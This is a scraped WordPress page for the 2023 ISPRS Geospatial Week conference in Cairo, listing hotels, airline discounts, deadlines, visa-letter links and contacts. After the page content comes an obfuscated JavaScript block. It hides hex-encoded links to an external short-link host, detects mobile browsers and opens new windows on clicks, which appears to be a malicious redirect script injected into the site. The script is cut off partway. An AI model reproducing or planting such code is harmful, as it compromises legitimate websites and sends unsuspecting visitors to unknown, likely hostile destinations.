css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687571540500{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1690251156587{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><img class=\"alignnone wp-image-5041 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></h4>\n<p style=\"text-align: center;\">Email : gsw2023@funtrip-travel.com</p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 